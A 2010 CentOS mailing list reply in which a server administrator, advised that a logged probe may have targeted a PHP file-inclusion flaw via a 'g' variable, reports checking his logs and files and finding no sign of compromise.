On Sun, 22 Aug 2010, Gordon Messmer wrote:
> No, they didn't. That's why you were warned that it was a potentially
> successful probe.
>
> The exploit requires that you are running php and have a script that
> includes a file referenced by the global variable "g" (or maybe the http
> request varible "g"). You should check the files that appear at the
> URLs indicated in your logs. If any of those files are php, then you
> should further check those to see if they might include files based on
> the "g" variable. If so, you may have been compromised.
Hello Gordon,
Thanks...you are right, those aren't 404 errors, I was looking at
something else. I checked through my logs, checked a bunch of files,
directories, and such...everything appears to be in order. I tried the
URL's they tried and all I got was my website and a 404 error for the two
links. I do have PHP installed, but I don't have any PHP scripts
running. If anyone else has any other suggestions, though, I'll keep
digging.
*******************************************************************************
Gilbert Sebenste ********
(My opinions only!) ******
Staff Meteorologist, Northern Illinois University ****
E-mail: sebenste@xxxxxxxxxxxxxxxxxxxxx ***
web: http://weather.admin.niu.edu **
*******************************************************************************
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
